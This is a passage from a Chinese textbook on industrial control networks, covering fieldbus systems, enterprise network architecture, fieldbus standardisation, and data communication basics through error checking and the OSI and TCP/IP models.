FCS采用一对多的双向传输信号,采用数字信号,提高了数据传输精度,增强了可靠性。设备始终处于操作员的远程监控和控制状态下。现场总线的开放性可以使用户按需求自由选择不同厂商的设备并构成系统,而无须考虑接口问题。智能仪表具有通信、控制和运算等丰富的功能,且控制功能都分散到各个智能仪表中去了。正是由于FCS的以上特点,帮助用户降低了安装、使用和维护的成本,最终达到了增加利润的目的。现场总线技术是控制技术、计算机技术、通信技术的交叉与集成,几乎涵盖了所有离散、连续工业领域,如过程自动化、加工制造自动化、楼宇自动化及家庭自动化等。它的出现和快速发展体现了控制领域对降低成本、提高可靠性、增强可维护性和提高数据采集智能化的要求。现场总线技术的发展体现为两方面:一方面是低速现场总线的不断发展和完善;另一方面是高速现场总线技术的发展。工业自动化技术应用于各行各业,要求也不尽相同,使用单一的现场总线技术很难满足所有行业的技术要求。现场总线不同于计算机网络,人们将要面对的是一个多种总线技术标准并存的现实世界。现场总线技术的关键技术之一就是彼此的互操作性,实现现场总线技术标准的统一是所有用户的愿望。 目前,在工业过程控制系统中,主要有三大控制系统,即DCS、PLC和FCS。它们在自动化技术发展的过程中都扮演了不可替代的角色。虽然FCS是现在和未来的发展方向,但是由于一些主观和客观因素的限制,还不能完全取代其他控制系统。每一种控制系统都有其特色和长处,所以当FCS技术出现以后,在一定时期内,DCS、PLC和FCS三大控制系统相互融合的程度可能会大大超过相互排斥的程度。目前,在中小型项目中使用的控制系统比较单一和明确,但在大型工程项目中,大多使用的是DCS、PLC、FCS的混合系统。 2.控制网络及其发展趋势 工业企业网络一般包含两部分:处理工业控制系统管理与决策信息的信息网络和处理控制现场实时测控信息的控制网络。信息网络一般处于企业中上层,处理大量的、变化的、多样的信息,具有高速综合的特征。控制网络主要位于企业中下层,处理实时的、现场的信息,具有实时性强、可靠安全性要求高等特征。 (1)控制网络的定义与发展控制网络是指将具有数字通信能力的测量控制仪表作为网络节点,采用公开、规范的通信协议,把控制设备连接成可以相互沟通信息、共同完成自控任务的网络系统。 与普通网络计算机系统相比,工业控制网络具有以下特点: 1)实时性和时间确定性。 2)信息多为短帧结构,且交换频繁。 3)可靠性和安全性高。 4)网络协议简单实用。 5)网络结构具有分散性。 6)易于实现与信息网络的集成。 (2)控制网络与信息网络的集成将控制网络和信息网络集成,主要基于以下几点考虑: 1)可以建立企业综合实时信息库,为企业的优化控制、调度决策提供依据。 2)可以建立分布式数据库管理系统,保证数据的一致性、完整性和可操作性。 3)可以实现对现场设备及控制网络的远程监控、优化调度及远程诊断等功能。 4)可以实现控制网络的远程软件维护与更新功能。 5)可以将测控网络连接到更大的网络系统中,如Intranet、Extranet和Internet。 (3)管控一体化的网络集成式控制系统管控一体化集成系统(Management⁃ControlIntegrationSystem,MCIS)是采用计算机、网络、工业电视、数据库、自动控制和接口通信等诸多先进技术,以生产过程控制系统和工厂安全监控系统为基础,通过对企业生产管理、过程控制、安全监控等信息的处理、分析、优化、整合、存储和发布,应用现代化企业管理模式建立覆盖企业生产管理与基础自动化的综合系统。MCIS可将企业生产全过程的实时数据、音视频数据及生产管理信息有机集成并优化,实现企业信息共享和有效利用,实现企业经营过程的整体优化。 管控一体化集中控制室是一个数字化“大”控制室,它不仅包含企业底层生产过程控制、产品质量控制、设备运行状态监控、能源监测与监控等大量工业现场实时数据信息、工业电视监控信息和安全报警监控信息,而且覆盖了企业内部安全生产管理全过程,通过流程整体优化、信息集成和功能集成,实现对企业资源的计划、调度和控制,增加产品产量,提高产品质量,降低生产消耗和生产经营成本,提高整个企业的运营效率和市场竞争力。 1.2控制网络在企业网络系统中的作用 1.2.1企业网络系统 企业网络(EnterpriseNetwork),一般是指在一个企业范围内将信号检测和数据传输、处理、存储、计算、控制等设备或系统连接在一起,以实现企业内部的资源共享、信息管理、过程控制、经营决策,并能够访问企业外部信息资源,使得各项事务协调动作,从而实现企业集成管理和控制的一种网络环境。企业网是一个企业的信息基础设施,它涉及局域网、广域网、现场总线以及网络互联等技术,是计算机技术、信息技术和控制技术在企业管理与控制中的有机统一。 企业网络技术是一种由控制网络和信息网络综合而成的集成系统,它涉及计算机技术、通信技术、多媒体技术、管理技术、控制技术和现场总线技术等。因国内需求的提高和相关技术的发展,要求工业企业技术网能同时处理数据、声音、图像、视频等多媒体信息,满足从管理决策到现场控制自上而下的应用需求。 企业网络具有以下几种特性: (1)范围确定性企业网络是在有关企业范围内为实现企业的集成管理和控制而建成的网络环境,具有特定的地域和服务范围,并能实现从现场实时控制到管理决策支持的功能。 (2)集成性企业网络通过对计算机技术、信息与通信技术和控制技术等技术的集成,达到了现场信号检测、数据处理、实时控制到信息管理、经营决策等功能上的集成,从而构成了企业信息基础设施的基本骨架。 (3)安全性企业网络不同于Internet和其他网络。它作为相对独立单位的某个企业的内部网络,在企业信息保密和防止外部入侵方面要求高度的安全性,要确保企业能通过企业网络获取外部信息和发布内部公开信息,相对独立和安全地处理内部事务。 (4)相对开放性企业网络系统早期的结构复杂,功能层次较多,包括从过程控制、监控、调度、计划、管理到经营决策等。随着互联网的发展和以太网技术的普及,企业网络早期的技术办公协议/制造自动化协议(TOP/MAP)式多层次分布式子网的结构逐渐被以太网、FDDI主干网取代。企业网络系统的结构层次趋于扁平化,同时对功能层次的划分也更为简化。企业网络是连接企业各部门的桥梁和纽带,它是一个广域网,并与Internet连接,实现企业对外联系的职能。也就是说,企业网络是作为Internet的一个组成部分出现的,它具有开放性,但这种开放性是在高度安全保障措施下的相对的开放性。按网络连接结构,一般将企业的网络系统划分为3层,它以底层的控制网(Infranet)为基础,中间为企业的内部网(Intranet),并通过它伸向外部的互联网(Internet),从而形成了Internet⁃Intranet⁃Infranet的网络结构。从功能上将企业网结构划分为信息网和控制网上下两层。 企业网络为企业综合自动化服务。信息网络一般处理企业管理与决策信息,位于企业网中上层,具有综合、信息量大等特征。控制网络处理企业实时控制信息,位于企业网中下层,具有协议简单、容错性强、成本低廉等特征。信息网是企业数据共享和传输的载体,它需要满足如下要求: ①高速通信网。 ②能够实现多媒体传输。 ③能与Internet互联。 ④开放系统。 ⑤满足数据安全性要求。 ⑥易于扩展和更新。 控制网络与信息网络紧密地集成在一起,服从信息网的操作,同时又具有独立性和完整性。这种用于自动控制的下层网络,可把具有通信功能的控制设备连接起来,在控制现场形成低成本高可靠性的分布式系统控制网络。可以说,Internet⁃Intranet⁃Infranet这种结合相得益彰,进一步提升了企业网络的作用,为企业实现管理控制一体化创造了良好条件。企业要实现高效率、高效益、高柔性,必须有一体化的企业网络作为支撑。建立控制与管理一体化的工业企业网络将为计算机集成工厂自动化(ComputerIntegratedPlantAutomation,CIPA)与信息化创造有利的条件。 1.2.2控制网络的地位与作用 从以上分析中可以看到,生产过程的控制参数与设备状态等信息是企业信息的重要组成部分。无论从哪个角度来看,控制网络处于企业网络的下层,可以说它是构成企业网络的基础。 现场控制层所采用的控制网络种类繁多,内部通信一致性差,个体之间的差异性大,技术标准形形色色,这些差异使得控制网络之间、控制网络与外部互联网之间实现信息交换的难度加大,实现互联和互操作存在较多障碍。因此,需要从通信一致性、数据交换技术等方面改善控制网络的数据集成与交换能力。控制网络在企业网络中的主要作用是为自动化系统传递数字信息。它所传输的信息内容主要是生产装置运行参数的测量值、控制量、执行器工作位置、开关状态、报警状态、设备的资源与维护信息、系统组态、参数修改、零点量程调校信息等,企业的管理控制一体化系统需要这些控制信息的参与,优化调度等也需要集成不同装置的生产数据,并能实现装置间的数据交换。 1.3控制网络的应用现状与标准化 1.3.1应用现状 将DCS列为一类非开放性系统,则可以认为控制网络技术起源于现场总线。现场总线技术产生于20世纪80年代,但对它的研究开发之热却是近年之举。这一方面是因为信息时代各项技术的发展对自动化系统提出了更新的要求,促进了该领域的网络化、信息化进程;另一方面也是由于它本身所蕴含的技术经济潜力。欧洲、亚洲、北美洲的许多国家都投入巨额资金与人力研究开发该项技术,出现了现场总线技术与产品百花齐放、兴盛发展的态势。例如丹麦ProcesData公司1983年推出的P⁃Net、德国Siemens公司1984年推出的PROFIBUS(ProcessFieldBus)、法国Alston公司1987年推出的FIP(FactoryInstrumentationProtocol)等都属于早期推出且至今仍有较大影响的总线技术。据资料分析,世界上已经出现的各式各样的总线有100多种,其中宣称为开放性的总线就有40多种。同时也出现了各种以开发推广现场总线技术为目的的组织,例如现场总线基金会(FieldbusFoundation,FF)、LonMark协会、PROFIBUS协会、工业以太网协会(Indus⁃trialEthernetAssociation,IEA)、工业自动化开放网络联盟(IndustrialAutomationOpenNetworkAlliance,IAONA)等。 1.3.2控制网络的标准化 随着技术的发展,在许多国家、企业、地区形成了各式各样的现场总线标准。就国际标准而言,国际标准化组织(ISO)、IEC都卷入了该项标准的制定。最早成为现场总线国际标准的是CAN,它属于ISO11898标准。 IEC/TC65负责测量和控制系统数据通信国际标准化工作的SC65C/WG6,是最先开始现场总线标准化工作的组织。它于1984年开始着手总线标准的制定,致力推出世界上单一的现场总线标准,也因此而历经坎坷。作为一项数据通信技术,单从应用需要与技术特点的角度统一通信标准是首选,但由于行业、地域发展历史和商业利益的驱使以及种种经济社会的复杂原因,总线标准的制定工作并非一帆风顺。在经历了多年的艰难历程和波及全球的现场总线大战之后,迎来的依旧是多种总线并存的尴尬局面。IEC现场总线物理层标准IEC61158⁃2诞生于1993年,从数据链路层开始,标准的制定一直处于混乱状态。IEC在经历多年争斗与调解的努力之后,于2000年宣布,原有的IEC61158、ControlNet、PROFIBUS、P⁃Net、HightSpeedEthernet、NewcomerSwiftNet、WorldFIP以及INTERBUS⁃S共8种现场总线标准共同构成IEC现场总线国际标准子集,这一结果违背了当初制定世界上单一现场总线标准的初衷。此后,人们对于制定国际现场总线标准已明显失去信心与兴趣。相比较而言,IEC/17B的工作要顺利得多。它负责制定的低压开关装置与控制装置作为控制设备之间的接口标准,即IEC62026国际标准已获通过。该标准包括第2部分AS⁃i、第3部分DeviceNet、第4部分智能分布式系统(SmartDistributedSystem,SDS)和第5部分Seriplex。2006年11月,全国工业过程测量和控制标准化技术委员会与中国机电一体化技术应用协会在北京钓鱼台国宾馆联合举行了“国家标准GB/T20540—2006PROFIBUS规范”和“国家标准化指导性技术文件GB/Z20541—2006PROFINET规范”的新闻发布会。至此,PROFIBUS成为中国第一个工业通信领域现场总线技术国家标准。其中PROFIBUS规范的标准号为GB/T20540—2006,PROFINET规范的编号为GB/Z20541—2006。现场总线PROFI⁃ BUS技术从宣传和推广应用开始到最后制定为我国的国家标准,经过了十年的历程。PRO⁃FIBUS是现场总线国际标准IEC61158中的类型3,它既适用于离散生产过程,如机械装备制造过程,又适用于连续生产过程,如石油化工过程等。 PROFIBUS是全球范围内唯一能够以标准方式应用于包括制造业、流程业及混合自动化领域并贯穿整个工艺过程的单一现场总线技术,它不仅可以无缝集成HART设备,保护用户的长期投资,而且可以安全地用于危险区域,同时在驱动技术和故障安全技术等领域有独特优势。PROFIBUS解决了企业生产现场设备之间的数字通信问题,为实现企业生产过程的自动化、智能化提供了保障,并将企业生产现场的信息纵向集成到企业管理层,为实现企业信息化和管控一体化创造了必要条件。PROFINET是一种以标准以太网为基础,适用于工业环境的工业以太网技术。它很好地解决了适用于工业环境的不同等级的实时性、网络安全以及与制造执行系统(MES)和企业管理系统(如ERP)透明集成等问题,还很好地解决了集成现有的现场总线系统保护原有投资的问题等,所有这些都是工业控制网络技术发展的方向和趋势。 第2章 数据通信与控制网络基础 数据通信是从20世纪50年代初开始,随着计算机的远程信息处理应用的发展而发展起来的。早期的远程信息处理系统大多是以一台或几台计算机为中心,依靠数据通信手段连接大量的远程终端,构成一个面向终端的集中式处理系统。20世纪60年代末,以美国的ARPA(AdvancedResearchProjectAgency)计算机网的诞生为起点,出现了以资源共享为目的的异机种计算机通信网,从而开辟了计算机技术的一个新领域———网络化与分布处理技术。20世纪70年代后,计算机网络与分布处理技术获得了迅速发展,从而也推动了数据通信的发展。1976年,国际电报电话咨询委员会(CCITT)正式公布了分组交换数据网的重要标准———X.25协议,其后又经多次的完善与修改,为公用与专用数据网的技术发展奠定了 基础。20世纪70年代末,国际标准化组织(ISO)为了推异机种系统的互连,提出了开放系统互连(OSI)参考模型,并于1984年正式通过,成为一项国际标准。此后,计算机网络技术与应用的发展即按照这一模型来进行,并得到了飞速发展。 2.1数据通信 数据通信是通信技术和计算机技术相结合而产生的一种新的通信方式。要在两地间传输信息必须有传输信道,根据传输媒体的不同,有有线数据通信与无线数据通信之分。但它们都是通过传输信道将数据终端与计算机连接起来,而使不同地点的数据终端实现软、硬件和信息资源的共享。数据通信系统指的是通过数据电路将分布在远地的数据终端设备与计算机系统连接起来,实现数据传输、交换、存储和处理的系统。 2.1.1通信系统模型 传递信息所需的一切技术设备的总和就是通信系统。通信系统一般由信息源、发送设备、传输介质、接收设备和信息接收者这几部分组成。 1.信息源与信息接收者 信息源是信息的产生者,信息的接收者是信息的使用者。在数字通信系统中传输的信息是数据,是数字化了的信息。这些信息可能是原始数据,也可能是经计算及处理后的结果,还可能是某些指令或标志。根据输出信号的性质的不同,信息源可分为模拟信息源和离散信息源。模拟信息源(如电话机、电视机、摄像机)输出幅度连续变化的信号;离散信息源(如计算机)输出离散的符号序列或文字。模拟信息源可通过抽样和量化变换为离散信息源。随着计算机和数字通信技术的不断发展,离散信息源的种类和数量越来越多。 2.发送和接收设备 发送设备的基本功能是将信息源和传输介质匹配起来,即信息源产生的消息信号经过编码,变换为便于传输的信号形式,送往传输介质。对于数字通信系统来说,发送设备的编码又常常可以分为信源编码和信道编码两部分。信源编码是把连续消息变换为数字信号;而信道编码则是使数字信号与传输介质匹配,提高传输的可靠性或有效性。变换方式是多种多样的,调制就是最常见的变换方式之一。接收设备的基本功能是完成发送设备的反变换,即进行解调、译码、解密等。它的任务是从带有干扰的信号中正确恢复出原始信息。对于多路复用信号,还包括解除多路复用,实现正确分路。 3.传输介质 从发送设备到接收设备之间信号传递所经过的媒介就是传输介质。传输介质可以是无线的,也可以是有线的。有线和无线均有多种传输介质,如电磁波、红外线为无线传输介质,各种电缆、光缆、双绞线、光纤等为有线传输介质。介质在传输过程中必然会引入某些干扰,如热噪声、脉冲干扰、衰减等。媒介的固有特性和干扰特性直接关系到变换方式的选择。 4.通信软件 报文与通信协议都属于通信系统中的软件,一般把需要传送的信息(包括文本、命令、参数值、图片、声音等)称为报文。它们是经过数字化后的信息,这些信息或是原始数据,或是测控参数值,或是经过计算机处理后的结果,还可能是某些指令或标志。各通信实体之间仅仅依靠传送的二进制码就希望能互相理解信息的内容是不可能的,还需要有一套事先规定的、共同遵守的规约。通信设备之间控制数据通信与理解通信数据的一组规则,即通信协议。协议定义了通信的内容、通信何时进行以及通信如何进行等内容。协议的关键要素是语法、语义和时序。 2.1.2通信系统的性能指标 在设计及评价一个通信系统时,必然涉及通信系统的性能指标问题。一般通信系统的性能指标包括信息传输的有效性、可靠性、适应性、经济性、保密性、标准性及维护使用方便等。对于一个通信系统,从信息传输角度讲,其主要任务是快速、准确地传递信息,因而有效性和可靠性是评价通信系统优劣的主要性能指标,也是通信技术讨论的重点。 1.有效性指标 数字通信系统的有效性可用传输速率和频带利用率来衡量,传输速率越高,系统的有效性就越好。可从以下两个不同的角度来定义传输速率。 (1)码元传输速率RB码元传输速率简称码元速率,是指单位时间内即每秒传输码元的数目,单位为波特(Baud),常用符号“B”表示。例如,某系统在2s内共传送4800个码元,则该系统的传码率为2400B。 虽然数字信号有二进制和多进制的区分,但码元速率与信号的进制无关,只与一个码元占有时间Tb有关,RB=1/Tb。 (2)信息传输速率Rb信息传输速率简称信息速率,又可称为传信率、比特率等,它是指单位时间即每秒钟内传送的信息量,单位为比特/秒(bit/s),常用符号Rb表示。例如,若某信源在1s内传送1200个符号,且每一个符号的平均信息量为1bit,则该信源的信息传输速率为Rb=1200bit/s。 (3)RB与Rb之间的关系携带数字信息的信号单元叫码元,一般几个二进制数组成一个码元。对于二进制系统,一位二进制数表示一个码元。对于M进制来说,每一码元的信息含量为log2M比特,故码元传输速率与比特传输速率之间的关系可用式RB=Rb/log2M表示。 (4)频带利用率频带利用率是表征信息传输速度的指标,定义为单位频带内所能实现的码元速率或信息速率,单位是Baud/Hz或bit/(s·Hz)。在频带宽度相等的条件下,码元速率(或信息速率)越高,频带利用率就越高,反之越低。 2.可靠性指标 可靠性指的是接收信息的准确程度,它是通信系统传输信息质量的象征。衡量数字通信系统可靠性的指标,可用信号在传输过程中出错的概率来表述,即用差错率来衡量。差错率越大,表明系统可靠性越差。差错率通常有以下两种表示方法。 (1)误码率Pe误码率是指在传输过程中发生差错的码元数在传输总码元数中所占的比例,更确切地说,误码率就是码元在传输系统中被传错的概率。用表达式可表示为Pe=接收错误的码元数/传输的码元总数 (2)误信率Pb误信率是指在传输过程中发生差错的信息量在信息传输总量中所占的比例,或者说,它是码元的信息量在传输系统中被丢失的概率。用表达式可表示为Pb=错误的信息数/传输的信息总数通信系统的有效性和可靠性两者之间是相互联系、相互制约的,可通过降低有效性的方法来提高系统的可靠性,或反之。 2.1.3数据编码 数据通信系统中采用最广泛的编码是美国标准信息交换码(AmericanStandardCodeforInformationInterchange,ASCII),这是一种7位编码,其128种不同组合分别对应一定的数字、字母、符号或特殊功能。例如十六进制的30~39分别表示数字0~9;十六进制的41表示字母A;十六进制的26、2B分别表示“&”和“+”;十六进制的0A、0D则分别表示换行与回车功能。图2⁃2列出了ASCII码所有组合的含义。计算机网络系统的通信任务是传送数据或数据化的信息。这些数据通常以离散的二进制0、1序列的方式表示。码元是传输数据的基本单位。在计算机网络通信中,传输的大多为二元码,它的每一位只能在1或0两个状态中取一个,每一位就是一个码元。 数据编码是指通信系统中以何种物理信号的形式来表达数据。分别用模拟信号的不同幅度、不同频率、不同相位来表达数据的0、1状态的,称为模拟数据编码;用高低电平的矩形脉冲信号来表达数据的0、1状态的,称为数字数据编码。采用数字数据编码,在基本不改变数字信号频率的情况下,直接传输数据信号的传输方式叫基带传输。基带传输可以达到较高的数据传输速率,是目前广泛应用的数据通信方式。 下面讨论几种数字数据编码波形。 1.单极性码 单极性码指信号电平是单极性的编码。例如逻辑“1”用高电平表示,逻辑“0”用零电平表示的信号表达方式为单极性码。 2.双极性码 双极性码的信号电平为正、负两种极性。例如逻辑“1”用正电平表示,逻辑“0”用负电平表示的信号表达方式为双极性码。 3.归零码(RZ) 在每一位二进制信息传输之后返回到零电平的编码称为归零码。例如逻辑“1”只在该码元时间中的某段(如码元时间的一半)维持高电平后就恢复到零电平,其逻辑“0”只在该码元时间一半维持负电平,之后也恢复到零电平。 4.非归零码(NRZ) 整个码元时间内都维持有效电平,称为非归零码。 5.差分码 用每个周期起点电平变化与否来代表逻辑“1”和逻辑“0”的编码。电平变化代表“1”,不变化代表“0”,按此规定的编码方式形成的编码称为差分码。差分码按初始状态为高电平或低电平,有截然相反的两种波形,其波形如图2⁃7所示。显然,差分码不可能是归零码。 差分码可以通过一个JK触发器来实现。当数据输出为“1”时,JK端均为“1”,由时钟脉冲使触发器翻转;当数据输出为“0”时,JK端均为“0”,触发器状态保持不变,从而实现了差分码。根据信息传输方式不同还可分为平衡传输和非平衡传输。平衡传输是指无论“0”或“1”都是传输格式的一部分;而在非平衡传输中,只有“1”被传输,“0”则在指定的时刻没有脉冲来表示。 6.曼彻斯特编码(ManchesterEncoding) 曼彻斯特编码是一种常用的基带信号编码,它具有内在的时钟信息,因而能使网络上的每一个节点保持时钟同步。在曼彻斯特编码中,把时间划为等间隔的小段,其中每小段代表1bit(即一位)。每个比特时间又被分为两段,前半个时间段所传输的信号是该时间段传送比特值的反码;后半个时间段传送的是比特值本身。可见,在一个时间段内,其中间点总有一次信号电平的变化,因而携带有信号传送的同步信息而不需另外传送同步信号。曼彻斯特编码过程与波形如图2⁃8所示。差分曼彻斯特编码(DifferentialManchesterEncoding)是曼彻斯特编码的一种变形。它既具有曼彻斯特编码在每个比特时间间隔中间信号一定会发生跳变的特点,也具有差分码用电平变化代表“1”,不变化代表“0”的特点,它通过检查信号在每个周期起点处有无跳变来区分1和0,这种检查信号跳变的方式往往更可靠,即使作为通信传输介质的两条导线颠倒了,对该编码信号的状态判断结果依然有效。图2⁃9表示曼彻斯特编码与差分曼彻斯特编码的信号波形。由频谱分析理论可知,理想的方波信号包含从零到无限高的频率成分,由于传输线中不可避免地存在分布电容,故允许传输的带宽是有限的,所以波形完全不失真的传输是不可能的。为了与线路传输特性匹配,除了很近距离的传输外,可用低通滤波器将矩形波整形为变换点比较圆滑的基带信号;在接收端,则在每个码元的最大值(中心点)处取样复原。 2.1.4通信线路的工作方式 1.单工通信 单工通信是指所传送的信息始终朝着一个方向,而不进行与此相反方向的传送。如图2⁃10a所示,设A为发送终端,B为接收终端,数据只能从A传送至B,而不能由B传送至A。单工通信线路一般采用二线制,例如无线电广播和电视信号的传送。 2.半双工通信 半双工通信是指信息流可以在两个方向上传送,但同一时刻只限于一个方向传输。如图2⁃10b所示,信息可以从A传至B,也可以从B传至A,所以通信双方都有发送器和接收器。要实现双向通信必须改换信道方向。半双工通信采用二线制线路,当A站向B站发送信息时,A站将发送器连接在信道上,B站将接收器连接在信道上;而当B站向A站发送信息时,B站则要将接收器从信道上断开,并把发送器接入信道,A站也要相应将发送器从信道上断开,而把接收器接入信道。这种在一条信道上进行转换,实现A→B与B→A两个方向通信的方式,称为半双工通信。工业数据通信中常采用半双工通信,例如对讲机就是采用这种通信方式实现信息的传送。 3.全双工通信 全双工通信是指通信系统能同时进行如图2⁃10c所示的双向通信。它相当于把两个相反方向的单工通信方式组合在一起,这种方式常用于计算机与计算机之间的通信。例如EIA⁃232、EIA⁃422采用的就是全双工通信方式。 2.1.5差错控制 1.差错的检测方法 差错检测就是监视接收到的数据并判别是否发生了传输错误。差错检测并不识别哪个或哪些错误,仅仅识别错误的出现。差错检测最常用的方法如下。 (1)冗余实行差错检验的一种简单办法是发送冗余数据。对每条报文,发送者都发送两次或多次,由接收者根据这两次或多次收到的数据是否一致来判断本次通信的有效性。当然,采用这种方法意味着每条报文都要花两倍或更多的时间来进行传输,在传送短报文时经常会用到它。许多红外线控制器就是使用这种方法进行差错检验的。 (2)回送回送被用在操作人员手工从键盘输入数据的通信系统中。把接收端收到的每一个字符都回送给操作人员,让操作人员来确认字符确实被正确地输入了。如果在回送字符期间出现了传输错误,就要进行重复传送。 (3)精确计数编码利用精确计数编码时,在每个字符中1的数量是相同的。接收端计算一个字符中1的个数,如果其总数不等于预先设定的值,就表明发生了一个错误。 (4)奇偶校验通信中经常采用奇偶校验来进行错误检查。可以按奇数位对校验位进行校验,也可以按偶数位进行校验,许多串口支持5~8个数据位再加上奇偶校验位的工作方式。偶校验是按数据位加上校验位共有偶数个“1”的规则填写校验位的方式;而奇校验是按数据位加上校验位共有奇数个“1”的规则填写校验位的方式。接收方检验接收到的数据,如果接收到的数据违背了事先约定的奇偶校验的规则,不是所期望的数值,说明出现了传输错误,则向发送方发送出错通知。 (5)求校验和这种差错检验方法是在通信数据中加入一个差错检验字节。对一条报文中的所有字节进行数学或者逻辑运算,计算出校验和,将校验和形成的差错检验字节作为该报文的组成部分,接收端对收到的数据重复这样的计算,如果得到的结果不相同,就判定通信过程发生了差错,说明它接收到的数据与发送的数据不一致。一个典型的计算校验和的方法是将这条报文中所有字节的值相加,然后使结果的最低字节的补码作为校验和。校验和通常只有一个字节,因而不会对通信量有明显的影响,适合在 长报文的情况下使用,但这种方法并不是绝对安全的,会存在很小概率的判断失误,那就是即便在数据并不完全吻合的情况下有可能出现得到的校验和一致,将有差错的通信过程判断为没有发生差错,导致通信结果失败。 (6)循环冗余校验(CRC)循环冗余校验即对传输序列进行一次除法操作,将进行除法操作的余数附加在传输信息的后面。在接收端,也进行同样的除法过程。如果接收端进行除法过程后的结果不是零,就表明发生了一个错误。CRC错误检查方法能够检测出99.95%的错误,但计算量大。 2.CRC的工作原理 CRC方法是将要发送的数据位序列当作一个多项式f(x)的系数,在发送方用收发双方预先约定的生成多项式G(x)去除,求得一个余数多项式。将余数多项式加到数据多项式之后再发送到接收端。接收端用同样的生成多项式G(x)去除接收数据多项式f′(x),得到计算余数多项式。如果计算余数多项式与接收余数多项式相同,则表示传输无差错;如果计算余数多项式不等于接收余数多项式,则表示传输有差错,由发送方重发数据,直至正确为止。CRC生成多项式G(x)由协议规定,目前已有多种生成多项式列入国际标准,例如:生成多项式G(x)的结构以及检错效果是经过严格的数学分析与试验后确定的。 2.2通信参考模型 2.2.1OSI参考模型 为了实现不同生产厂商的设备之间的互联操作与数据交换,ISO/TC97于1978年成立了“开放系统互联(OpenSystemInterconnection,OSI)”技术委员会,起草了开放系统互联模型的建议草案,该草案于1983年成为正式的国际标准ISO7498。1986年ISO又对该标准进行了进一步的完善和补充,形成了为实现开放系统互联所建立的分层模型,简称OSI参考模型。这是为计算机互联提供的一个共同基础和标准框架,为保持相关标准的一致性和兼容性提供了共同的参考。“开放”并不是指对特定的系统实现具体的互联网技术或手段,而是对标准的认同。一个系统是开放系统,是指它可以与世界上任意遵守相同标准的其他系统互联通信。OSI参考模型是在博采众长的基础上形成的互联网技术,它促进了数据通信与计算机网络的发展。OSI参考模型提供了概念性和功能性结构,将开放系统的通信功能划分为7个层次。各层的协议细节由各层独立进行,这样一旦引入新技术或提出新的业务要求,就可以把因功能扩充和变更所带来的影响限制在直接有关的层内,而不必改动全部协议。OSI参考模型分层的原则是将相似的功能集中在同一层内,功能差别较大时分层处理,每层只对相邻的上下层定义接口。OSI参考模型把开放系统的通信功能划分为7个层次。从连接物理介质的层次开始,分别赋予1,2,…,7层的顺序编号,相应地称之为物理层、数据链路层、网络层、传输层、会话层、表示层和应用层。OSI参考模型如图2⁃12所示。 1.物理层 物理层(PhysicalLayer)涉及通信在信道上传输的原始比特流。设计上必须保证一方发出二进制“1”时,另一方接收的也是“1”而不是“0”。这里的典型问题是:用多少伏电压表示“1”,多少伏电压表示“0”;一个比特持续多少微秒;传输是否在两个方向上同时进行;最初的连接如何建立和完成通信后连接如何终止;网络连接插件有多少针以及各针的用途。这里的设计主要是处理机械的、电气的、过程的接口,以及物理层下的物理传输介质等问题。 2.数据链路层 数据链路层(DataLinkLayer)的主要任务是加强物理层传输原始比特的功能,使之对网络层提供一条无错线路。发送方把输入数据分装在数据帧里(典型的帧为几百字节或几千字节),按顺序传送各帧,并处理接收方回送的确认帧(AcknowledgementFrame)。因为物理层仅仅接收和传送比特流,并不关心它的意义和结构,所以只能依赖各链路层来产生和识别帧边界。可以通过在帧的前面或后面附加上特殊的二进制编码模式来达到这一目的。如果这些二进制编码偶然在数据中出现,则必须采取特殊措施以避免混淆。 3.网络层 网络层(NetworkLayer)控制子网之间连接关系的运行,其中一个关键问题就是确定分组从源端到目的端如何选择路由。路由可以选用网络中固定的静态路由表,也可以在每一次会话开始时决定,还可以根据当前网络的负载状况,高度灵活地为每一个分组决定路由。如果在子网中同时出现过多的分组,它们将相互阻塞通路,形成瓶颈。此类阻塞控制也属于网络层的范围。当分组不得不跨越一个网络到达目的地时,新的问题又会产生:第二个网络的寻址方式可能和第一个网络完全不同;第二个网络可能由于分组太长而无法接收;两个网络使用的协议也可能不同等。网络层必须解决这些问题,以便异种网络能够互联。在广播网络中,选择路由的问题很简单,所以网络层功能很弱,甚至不存在。 4.传输层 传输层(TransportLayer)的基本功能是从会话层接收数据,在必要时把它分成较小的单元传递给网络层,并确保到达对方的各段信息正确无误,而且这些任务都必须高效地完成。从某种意义上讲,传输层使会话层不受硬件技术变化的影响。 5.会话层 会话层(SessionLayer)允许不同机器上的用户建立会话关系。会话层允许进行类似传输层的普通数据的传输,并提供了对某些应用有用的增强服务会话,也可用于远程登录到分时系统或在两台机器间传递文件。 6.表示层 表示层(PresentationLayer)完成某些特定的功能,由于这些功能常被请求,因此人们希望找到通用的解决办法,而不是让每个用户来实现。值得一提的是,表示层以下的各层只关心可靠的传输比特流,而表示层关心的是所传输信息的语法和语义。 7.应用层 应用层(ApplicationLayer)包含大量用户需要的协议。例如,世界上有成百种不兼容的终端信号,如果希望一个全屏幕编辑程序能工作在网络中许多不同类型的终端上,每个终端都有不同的屏幕格式、插入和删除文本的换码序列、光标移动等,其困难可想而知。解决这一问题的方法之一是定义一个抽象的网络虚拟终端(NetworkVirtualTerminal),编辑程序和其他所有程序都面向该虚拟终端。而对于每一种终端类型,都写一段软件来把网络虚拟终端映射到实际的终端。例如,把虚拟终端的光标移到屏幕左上角时,该软件必须发出适当的命令使真正的终端的光标移动到同一位置。所有虚拟终端软件都位于应用层。 2.2.2TCP/IP参考模型 ARPANET是由美国国防部(U.S.DepartmentofDefense)赞助研究的网络,ARPANET完全符合ISO/OSI参考模型,被称为计算机互联网络的“祖父”,它通过租用电话线连接了数百所大学和政府部门。当卫星和无线网络出现后,现有的协议和它们互联时出现了问题,需要一种新的参考体系结构。这个体系结构在它的两个主要协议即传输控制协议(TCP)和网际协议(IP)出现以后,被称为TCP/IP参考模型(TCP/IPReferenceModel)。 1.互联网层 所有的这些实现多个网络之间无缝隙连接的需求导致了基于无连接互联网络的分组交换网络的出现。这一层被称为互联网层(InternetLayer),它是整个体系结构的关键部分,其功能是使主机可以把分组发往任何网络并使分组独立地传向目标。这些分组到达的顺序和发送的数据可能不同,因此,如果需要按顺序发送及接收时,高层必须对分组进行排序。互联网层定义了正式的分组和协议,即IP。互联网层的功能就是把IP分组发送到应该去的地方。分组路由和避免阻塞是这里的关键设计问题。由于这些原因,有理由说TCP/IP参考模型互联网层和OSI参考模型网络层在功能上非常相似。图2⁃13是它们的对应关系。 2.传输层 